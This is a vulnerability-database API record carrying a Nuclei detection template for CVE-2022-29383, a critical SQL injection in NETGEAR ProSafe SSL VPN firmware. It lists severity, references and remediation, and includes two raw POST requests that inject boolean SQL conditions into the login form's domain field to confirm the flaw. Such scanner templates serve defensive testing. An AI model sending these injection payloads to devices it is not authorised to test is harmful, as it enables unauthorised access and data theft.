{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-29383/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-29383/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-29383/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-29383/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-29383/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-29383"},"sightings":{"href":"/api/v1/sightings/cve-2022-29383"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-29383.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-29383\n\ninfo:\n  name: NETGEAR ProSafe SSL VPN firmware - SQL Injection\n  author: elitebaz\n  severity: critical\n  description: |\n    NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service.\n  remediation: |\n    Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n  reference:\n    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383\n    - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-29383\n    - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222\n    - https://www.netgear.com/about/security/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-29383\n    cwe-id: CWE-89\n    epss-score: 0.48537\n    epss-percentile: 0.98826\n    cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: netgear\n    product: ssl312_firmware\n  tags: cve2022,cve,sqli,netgear,router,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /scgi-bin/platform.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=utf-8\n\n        thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n      - |\n        POST /scgi-bin/platform.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=utf-8\n\n        thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body_1, \"User authentication Failed\")\n          - contains(body_2, \"User Login Failed for SSLVPN User.\")\n        condition: and\n# digest: 4a0a004730450220145a1015e47c80bcc5be1d0f4a6f8ae21d9507495fabab631435279c213b9603022100ece7576902b5a2d12299a75f9154b1480b833fdca7399b6a4c6ec0ffb8972352:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-29383"}